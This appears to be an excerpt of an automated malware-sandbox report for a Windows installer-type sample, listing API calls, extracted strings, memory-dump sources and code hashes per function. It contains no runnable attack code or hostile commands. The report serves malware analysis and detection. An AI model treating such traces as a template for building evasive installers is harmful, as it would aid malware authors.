                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectoryErrorLastPath
                                                    • String ID: <3[
                                                    • API String ID: 953296794-3672254634
                                                    • Opcode ID: 43e515d8cc3df0b0a068342b4d81a255db3da276d4f7548e009c1a037efc9ad9
                                                    • Instruction ID: af7114157d539cc64f9231f34e1301323b489d29499567394d73aa9fabd787b0
                                                    • Opcode Fuzzy Hash: 43e515d8cc3df0b0a068342b4d81a255db3da276d4f7548e009c1a037efc9ad9
                                                    • Instruction Fuzzy Hash: 1381C471E006089FDB10DFA8C885BEEBBF4FF15324F14425AE914A72D0EB759909CB55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph: function at 496110-496198 (rendered graph; nodes marked Executed / Not Executed)
                                                    APIs
                                                    • CreateThread.KERNEL32 ref: 0049618D
                                                    • GetLastError.KERNEL32 ref: 0049619A
                                                    • WaitForSingleObject.KERNEL32(00000000,FFFFFFFF), ref: 004961C3
                                                    • GetExitCodeThread.KERNEL32(00000000,?), ref: 004961DD
                                                    • TerminateThread.KERNEL32(00000000,00000000), ref: 004961F5
                                                    • CloseHandle.KERNEL32(00000000), ref: 004961FE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Thread$CloseCodeCreateErrorExitHandleLastObjectSingleTerminateWait
                                                    • String ID: <s[
                                                    • API String ID: 1566822279-714827695
                                                    • Opcode ID: 6112c75bdb4bb2272e09ae5d58f46b15bb59a66a172f07faf6de1752d6278465
                                                    • Instruction ID: a1b4e3905923fe97384293418a8d3952bb5cbef56ccafba0ea5eef01f8058300
                                                    • Opcode Fuzzy Hash: 6112c75bdb4bb2272e09ae5d58f46b15bb59a66a172f07faf6de1752d6278465
                                                    • Instruction Fuzzy Hash: 8431B9759402099BDF10DF94CD09BEEBBF4FB09714F10422AE910B63D0DB799A09DBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 004867F0: GetTickCount.KERNEL32 ref: 00486874
                                                      • Part of subcall function 004867F0: __Xtime_get_ticks.LIBCPMT ref: 0048687C
                                                      • Part of subcall function 004867F0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004868C6
                                                      • Part of subcall function 004AAC30: GetUserNameW.ADVAPI32(?,?), ref: 004AACC5
                                                      • Part of subcall function 004AAC30: GetLastError.KERNEL32 ref: 004AACCB
                                                      • Part of subcall function 004AAC30: GetUserNameW.ADVAPI32(?,?), ref: 004AAD13
                                                      • Part of subcall function 004AAC30: GetEnvironmentVariableW.KERNEL32(UserDomain,00000000,00000000), ref: 004AAD49
                                                      • Part of subcall function 004AAC30: GetEnvironmentVariableW.KERNEL32(UserDomain,?,00000000,00000000,00000000), ref: 004AAD93
                                                    • __Init_thread_footer.LIBCMT ref: 00486AB1
                                                    • GetCurrentProcess.KERNEL32(00000008,?,D13B3340), ref: 00486CA8
                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00486CAF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentNameProcessUserVariable$CountCurrentErrorInit_thread_footerLastOpenTickTokenUnothrow_t@std@@@Xtime_get_ticks__ehfuncinfo$??2@
                                                    • String ID: \/:*?"<>|$c$c
                                                    • API String ID: 1521599615-2627790902
                                                    • Opcode ID: 4f25b5ca6632e7818880fb6bbac65390ae6bb8b1a5584c743134c1af7635a253
                                                    • Instruction ID: f9534dfe44f63c55e41c8169f7265cbe2b91b060f98042a624e2c9962e46d612
                                                    • Opcode Fuzzy Hash: 4f25b5ca6632e7818880fb6bbac65390ae6bb8b1a5584c743134c1af7635a253
                                                    • Instruction Fuzzy Hash: 24B1F171D00258CBDB10DFA8C845BAEBBB1FF45304F258669E811AB392DB346E05CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph: function at 454b90 (rendered graph; nodes marked Executed / Not Executed)
                                                    APIs
                                                      • Part of subcall function 00454B90: GetModuleFileNameW.KERNEL32(00000000,?,00000104,D13B3340,00000000,?,00583F86,000000FF), ref: 00454AD8
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                    • FreeLibrary.KERNEL32(00000001,D13B3340,?,00000001,?,?,?), ref: 00454D27
                                                    • EnterCriticalSection.KERNEL32(0063946C), ref: 00454D42
                                                    • DestroyWindow.USER32(00000000), ref: 00454D60
                                                    • LeaveCriticalSection.KERNEL32(0063946C), ref: 00454DA9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CriticalInit_thread_footerSection$DestroyEnterFileFreeHeapLeaveLibraryModuleNameProcessWindow
                                                    • String ID: %s%lu$.local
                                                    • API String ID: 3496055493-548699545
                                                    • Opcode ID: dd98786b5193d96e0677c1dc648b6d78b315478e4fcfa6a5af175d68c84f8871
                                                    • Instruction ID: 60c8fdd1b3697531dadef8adb382c097b95e84ab8be05c9bcdae89cd0156de6e
                                                    • Opcode Fuzzy Hash: dd98786b5193d96e0677c1dc648b6d78b315478e4fcfa6a5af175d68c84f8871
                                                    • Instruction Fuzzy Hash: A991E071A012019FDB21DF59C848B5BBBF4FF8131AF14456EE815AB392CB78A848CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph: function at 4b00a0 (rendered graph; nodes marked Executed / Not Executed)
                                                    APIs
                                                    • SetFilePointer.KERNEL32(005952BD,-00000400,?,00000002,00000400,D13B3340,?,?,?), ref: 004B0146
                                                    • GetLastError.KERNEL32(?,?), ref: 004B0154
                                                    • ReadFile.KERNEL32(005952BD,00000000,00000400,?,00000000,?,?), ref: 004B016F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: File$ErrorLastPointerRead
                                                    • String ID: ADVINSTSFX
                                                    • API String ID: 64821003-4038163286
                                                    • Opcode ID: f83d391e32f9efe111bfced9c3bbdf6018bc12824cc6205697b691c073363971
                                                    • Instruction ID: 3e7ca1773149a8fc703744e4809b6b13da19d4c33075155b3eeda38cd043cb95
                                                    • Opcode Fuzzy Hash: f83d391e32f9efe111bfced9c3bbdf6018bc12824cc6205697b691c073363971
                                                    • Instruction Fuzzy Hash: 3461D271A002099BDB08CFA8C884BFFBBB5FF55311F244666E505A7381D739AD46CB68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph: function at 476b40 (rendered graph; nodes marked Executed / Not Executed)
                                                    APIs
                                                      • Part of subcall function 00471C70: __Init_thread_footer.LIBCMT ref: 00471D42
                                                    • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,D13B3340,00000000,00000000,?), ref: 00476B95
                                                    • GetTempFileNameW.KERNEL32(00000000,shim_clone,00000000,?,?), ref: 00476C5C
                                                    • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00476CFF
                                                    • CopyFileW.KERNEL32(?,?,00000000), ref: 00476D21
                                                    • Wow64RevertWow64FsRedirection.KERNEL32(?), ref: 00476D4D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Wow64$FileRedirection$CopyDisableFolderInit_thread_footerNamePathRevertTemp
                                                    • String ID: shim_clone
                                                    • API String ID: 1326775856-3944563459
                                                    • Opcode ID: c240e595c57c5eb6741a122baad4ac523b7125a369cfa3c7c58d8796ed82db53
                                                    • Instruction ID: 3d0b673aaabd8acbefb42e576616830cb9870440d20b5af0fe31723d37240c02
                                                    • Opcode Fuzzy Hash: c240e595c57c5eb6741a122baad4ac523b7125a369cfa3c7c58d8796ed82db53
                                                    • Instruction Fuzzy Hash: 4E612670A006589EDB25DF24CC45BEAB7B5EF55300F1480AEE54997292DB389E84CB58
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph: function at 4b1610 (rendered graph; nodes marked Executed / Not Executed)
                                                    APIs
                                                    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,D13B3340,00000000,?,?,?,?,?,?,?,00000000,0059574D,000000FF), ref: 004B1650
                                                    • CreateThread.KERNEL32 ref: 004B1686
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004B178F
                                                    • GetExitCodeThread.KERNEL32(00000000,?), ref: 004B179A
                                                    • CloseHandle.KERNEL32(00000000), ref: 004B17BA
                                                      • Part of subcall function 0035A850: RtlAllocateHeap.NTDLL(?,00000000,?,D13B3340,00000000,00547F70,000000FF,?,?,0062EFDC,?,004AC2E8,80004005,D13B3340,?,?), ref: 0035A89A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CreateThread$AllocateCloseCodeEventExitHandleHeapObjectSingleWait
                                                    • String ID: <3[
                                                    • API String ID: 978852114-3672254634
                                                    • Opcode ID: 09425a74bb5e0c1236bbed9c946cdff4a64ac141eaaa47f30034cba55d6325c9
                                                    • Instruction ID: 39af22c1fc1466cc964876aa36882f0bd24865068c488a9fe966575bed6f8b2b
                                                    • Opcode Fuzzy Hash: 09425a74bb5e0c1236bbed9c946cdff4a64ac141eaaa47f30034cba55d6325c9
                                                    • Instruction Fuzzy Hash: 69515874A00709DFCB10CF69C894FAABBF4FF49714F24465AE916A77A1DB34A804CB64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph: function at 368da1 (rendered graph; nodes marked Executed / Not Executed)
                                                    APIs
                                                    • CallWindowProcW.USER32(?,?,?,?,00000024), ref: 00368E40
                                                    • GetWindowLongW.USER32(?,000000FC), ref: 00368E55
                                                    • CallWindowProcW.USER32(?,?,00000082,?,00000024), ref: 00368E6B
                                                    • GetWindowLongW.USER32(?,000000FC), ref: 00368E85
                                                    • SetWindowLongW.USER32(?,000000FC,?), ref: 00368E95
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Window$Long$CallProc
                                                    • String ID: $
                                                    • API String ID: 513923721-3993045852
                                                    • Opcode ID: d065a3af4c8552062518a187989b4368af4d1917b9e6c8192b99c34b79d42f71
                                                    • Instruction ID: 9bce55de9d1a10be26dc3730bde275b4aee4e0727ca00f0b797481fef20c8bb3
                                                    • Opcode Fuzzy Hash: d065a3af4c8552062518a187989b4368af4d1917b9e6c8192b99c34b79d42f71
                                                    • Instruction Fuzzy Hash: AD4113B1508700AFC760DF19C884A1BBBF9FF89720F509A1DF5AA836A1C772E8448B51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetDlgItem.USER32(?,00000002), ref: 0048E410
                                                    • GetWindowRect.USER32(00000000,?), ref: 0048E426
                                                    • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,00495F2A,?,?,?,?,?,?), ref: 0048E43F
                                                    • InvalidateRect.USER32(00000000,00000000,00000001,?,?,?,?,?,?,?,00495F2A,?,?), ref: 0048E44A
                                                    • GetDlgItem.USER32(00000000,000003E9), ref: 0048E45C
                                                    • GetWindowRect.USER32(00000000,?), ref: 0048E472
                                                    • SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000206,?,?,?,?,?,?,?,00495F2A), ref: 0048E4B5
                                                    Similarity
                                                    • API ID: Window$Rect$Item$InvalidateShow
                                                    • String ID:
                                                    • API String ID: 2147159307-0
                                                    • Opcode ID: cf476556d503f82005899108b00d64843c2d3830a1703f2dcc38f8c6d5db63d8
                                                    • Instruction ID: a59b89445afdad092082990ab9d705ba3f9fee2e28f824247cb3f627cd354b29
                                                    • Opcode Fuzzy Hash: cf476556d503f82005899108b00d64843c2d3830a1703f2dcc38f8c6d5db63d8
                                                    • Instruction Fuzzy Hash: 7C216D71608300AFE310DF34DC49A6B7BE9EF8C710F009659F849D7292E730E9818B96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetFileVersionInfoSizeW.KERNELBASE(80004005,0058FE45,D13B3340,?,?,00000000,?,?,00000000,0058FE45,000000FF,?,80004005,D13B3340,?), ref: 004770D5
                                                    • GetFileVersionInfoW.KERNELBASE(80004005,?,00000000,000000FF,00000000,?,00000000,?,?,00000000,0058FE45,000000FF,?,80004005,D13B3340,?), ref: 00477123
                                                    Strings
                                                    Similarity
                                                    • API ID: FileInfoVersion$Size
                                                    • String ID: ProductName$\StringFileInfo\%04x%04x\%s$\VarFileInfo\Translation
                                                    • API String ID: 2104008232-2149928195
                                                    • Opcode ID: c90d7019636028a09b09bce33223ea9656682277339a396b516f084186f9a9d3
                                                    • Instruction ID: a4f79770029e637524a4e9991c1cd25ae962502ba4adcce1817402a428f7a941
                                                    • Opcode Fuzzy Hash: c90d7019636028a09b09bce33223ea9656682277339a396b516f084186f9a9d3
                                                    • Instruction Fuzzy Hash: 4A61DF719051099FCB14CFA8C849AEFBBB8FF05315F54819AE825A7391EB349D04CBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,D13B3340,?,00000010,?,00489EF0,?), ref: 00486556
                                                    • SetFilePointer.KERNEL32(00000000,?,00000010,00000000), ref: 0048659F
                                                    • ReadFile.KERNEL32(00000000,D13B3340,?,?,00000000,00000078,?), ref: 004865E1
                                                    • FindCloseChangeNotification.KERNEL32(00000000), ref: 0048665A
                                                    Strings
                                                    Similarity
                                                    • API ID: File$ChangeCloseCreateFindNotificationPointerRead
                                                    • String ID: <3[
                                                    • API String ID: 2405668454-3672254634
                                                    • Opcode ID: f686f018058d1c55a67c35f9a1c0daf46152040b48d3447d69830ee530fac4e7
                                                    • Instruction ID: f3770de7da9039c619e63a0e748317dfdab2e6dd6b8eff65d5b26faa97b508ae
                                                    • Opcode Fuzzy Hash: f686f018058d1c55a67c35f9a1c0daf46152040b48d3447d69830ee530fac4e7
                                                    • Instruction Fuzzy Hash: 05517E70900649ABDB11DBA8CC48BEEFBB8FF05324F14865AE411BB2D1EB749905CB64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 00476B40: SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,D13B3340,00000000,00000000,?), ref: 00476B95
                                                      • Part of subcall function 00476B40: GetTempFileNameW.KERNEL32(00000000,shim_clone,00000000,?,?), ref: 00476C5C
                                                    • GetFileVersionInfoSizeW.KERNELBASE(?,000000FF,Shlwapi.dll,D13B3340,00000000,?,?,00000000,00589775,000000FF,Shlwapi.dll,00476F16,?,?,?), ref: 00476FAD
                                                    • GetFileVersionInfoW.KERNELBASE(?,?,?,00000000,00000000,?,?), ref: 00476FD9
                                                    • GetLastError.KERNEL32(?,?), ref: 0047701E
                                                    • DeleteFileW.KERNEL32(?), ref: 00477031
                                                    Strings
                                                    Similarity
                                                    • API ID: File$InfoVersion$DeleteErrorFolderLastNamePathSizeTemp
                                                    • String ID: Shlwapi.dll
                                                    • API String ID: 1346648681-1687636465
                                                    • Opcode ID: 93906f9f02e6d5758f1e106fe8c50b5dd5bebfbe3c3624d413469755b148282f
                                                    • Instruction ID: dd1d5d26ac35164ac1e66cb5daf6f66a73addd9442e8762d16fcdf5e92ed2446
                                                    • Opcode Fuzzy Hash: 93906f9f02e6d5758f1e106fe8c50b5dd5bebfbe3c3624d413469755b148282f
                                                    • Instruction Fuzzy Hash: 483192B1A05249AFDB10CFA5DD44FEFBBB8FF09350F14811AE905A3280DB399904CBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadLibraryW.KERNEL32(ComCtl32.dll,D13B3340,?,?,00000000), ref: 0046FF6E
                                                    • GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 0046FF91
                                                    • FreeLibrary.KERNEL32(00000000), ref: 0047000F
                                                    Strings
                                                    Similarity
                                                    • API ID: Library$AddressFreeLoadProc
                                                    • String ID: ComCtl32.dll$LoadIconMetric
                                                    • API String ID: 145871493-764666640
                                                    • Opcode ID: c728b14eaf6841efa3d3206d9f1e9d578be470ad3e756b4783d12a2b13dee867
                                                    • Instruction ID: bb499d387d9d6e88b586777515f341671674f2bf32f87e305ccaf1c078b470b5
                                                    • Opcode Fuzzy Hash: c728b14eaf6841efa3d3206d9f1e9d578be470ad3e756b4783d12a2b13dee867
                                                    • Instruction Fuzzy Hash: F7316471A04259ABDB149F95DC44BAFBFF8FB49760F10412AF915A3280DB799A048B90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • MsgWaitForMultipleObjectsEx.USER32(00000001,00000000,000000FF,000005FF,00000004), ref: 0046D801
                                                    • PeekMessageW.USER32(?,00000000), ref: 0046D847
                                                    • TranslateMessage.USER32(00000000), ref: 0046D852
                                                    • DispatchMessageW.USER32(00000000), ref: 0046D859
                                                    • MsgWaitForMultipleObjectsEx.USER32(00000001,?,000000FF,000005FF,00000004), ref: 0046D86B
                                                    Similarity
                                                    • API ID: Message$MultipleObjectsWait$DispatchPeekTranslate
                                                    • String ID:
                                                    • API String ID: 4084795276-0
                                                    • Opcode ID: ba03a6d154a88906d6282858c8e5f52c592d84c9ceb37196c16ddd9c6691f5b6
                                                    • Instruction ID: d7f6fc9f8308a0188f2486420e6236ef9089f0016c44164ed10f4a4cdce439b1
                                                    • Opcode Fuzzy Hash: ba03a6d154a88906d6282858c8e5f52c592d84c9ceb37196c16ddd9c6691f5b6
                                                    • Instruction Fuzzy Hash: CC115C71A443097AE720DB519C81FAB73DCEB89770F401226FA10E31C0EB34E9458765
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • PathIsUNCW.SHLWAPI(?,D13B3340,?,00000010,?), ref: 0048F1AA
                                                      • Part of subcall function 0046E790: GetCurrentProcess.KERNEL32 ref: 0046E7D8
                                                      • Part of subcall function 0046E790: OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 0046E7E5
                                                      • Part of subcall function 0046E790: GetLastError.KERNEL32 ref: 0046E7EF
                                                      • Part of subcall function 0046E790: FindCloseChangeNotification.KERNEL32(00000000), ref: 0046E8D0
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                      • Part of subcall function 0035A140: FindResourceW.KERNEL32(00000000,?,00000006,?,?,000000A0,80070057,8007000E,80004005,00371A24,00000000,?,?,?,*.*), ref: 0035A163
                                                    Strings
                                                    Similarity
                                                    • API ID: Process$FindInit_thread_footer$ChangeCloseCurrentErrorHeapLastNotificationOpenPathResourceToken
                                                    • String ID: Extraction path set to:$[WindowsVolume]$\\?\
                                                    • API String ID: 2914359614-3538578949
                                                    • Opcode ID: a55d9a6d1439bdb786a903a544ba829934f24b342bafada76256ebd9dcdb012d
                                                    • Instruction ID: fa45d59832e1787bf1f6cbb4d6213decb0a9f181c9a19bc8fce2b0b1f394ca08
                                                    • Opcode Fuzzy Hash: a55d9a6d1439bdb786a903a544ba829934f24b342bafada76256ebd9dcdb012d
                                                    • Instruction Fuzzy Hash: 02C1F330A005059FDB11EFA8C844BAEFBB4AF45314F1486A9E814AF3A2DB74DD04CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNEL32(004C0324,40000000,00000001,00000000,00000002,00000080,00000000,D13B3340,?,00000001), ref: 004BF342
                                                    • WriteFile.KERNEL32(00000000,0000C800,0000C800,0000C800,00000000,?,0000C800), ref: 004BF3D8
                                                    • CloseHandle.KERNEL32(00000000,?,0000C800), ref: 004BF44C
                                                    Strings
                                                    Similarity
                                                    • API ID: File$CloseCreateHandleWrite
                                                    • String ID: <3[
                                                    • API String ID: 1065093856-3672254634
                                                    • Opcode ID: f9fb2c6a73683efd6e5501f0510376561f9812bd56cb8e1324e65681ebc7cd4d
                                                    • Instruction ID: 7cdcbf91c8c3450f1707c9c1f2996acf4051a32c50a9ff3f76aeac0c844fc5d8
                                                    • Opcode Fuzzy Hash: f9fb2c6a73683efd6e5501f0510376561f9812bd56cb8e1324e65681ebc7cd4d
                                                    • Instruction Fuzzy Hash: AC517E71A10219AFDF10DFA8DD45BDEBBB9FF45310F14422AF814A7290DB75A904CBA8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadStringW.USER32(?,00000000,?,00000100), ref: 00474C0C
                                                    • LoadStringW.USER32(?,00000000,?,00000001), ref: 00474CA0
                                                    Similarity
                                                    • API ID: LoadString
                                                    • String ID:
                                                    • API String ID: 2948472770-0
                                                    • Opcode ID: 6dab30f908a7e033ca7b28caf433f825ad390f551c9d8d1c3c230ddfdb3fd81e
                                                    • Instruction ID: b49f7172343a4f6dff83117f19d77416b80bcb038c791456adaacca80924ed39
                                                    • Opcode Fuzzy Hash: 6dab30f908a7e033ca7b28caf433f825ad390f551c9d8d1c3c230ddfdb3fd81e
                                                    • Instruction Fuzzy Hash: 17B19271D00209EFDB15DFA8D945BEEBBB5FF88310F10821AE815B7290DB746A44CB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                    • PathIsUNCW.SHLWAPI(?,?), ref: 0046CD26
                                                    Strings
                                                    Similarity
                                                    • API ID: Init_thread_footer$HeapPathProcess
                                                    • String ID: \\?\$\\?\UNC\
                                                    • API String ID: 806983814-3019864461
                                                    • Opcode ID: 692b99bb0219243c95fa0c18c1e385aeb5731b309e116c67e35b8b3f7649a58a
                                                    • Instruction ID: 76c24252f976518fc4e929f99c28b62f6559d45a75c2d6b998fe5af8e66192d4
                                                    • Opcode Fuzzy Hash: 692b99bb0219243c95fa0c18c1e385aeb5731b309e116c67e35b8b3f7649a58a
                                                    • Instruction Fuzzy Hash: 55C1C2719005099FDB00DBA9CC85BAEFBF9FF49314F14826AE415EB2D1EB399904CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

APIs
• DeleteFileW.KERNEL32(?,?,?,?,?,0048837F,?,?,?), ref: 0049457B
• CloseHandle.KERNEL32(?,D13B3340,?,00000000,?,?,?), ref: 0049465B
Memory Dump Source
• Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
Similarity
• API ID: CloseDeleteFileHandle
• String ID: <3[
• API String ID: 2633145722-3672254634
• Opcode ID: 430a3bf09af0d021aa7b824e831ad7b1256388222697a612fcfbd7d236aba998
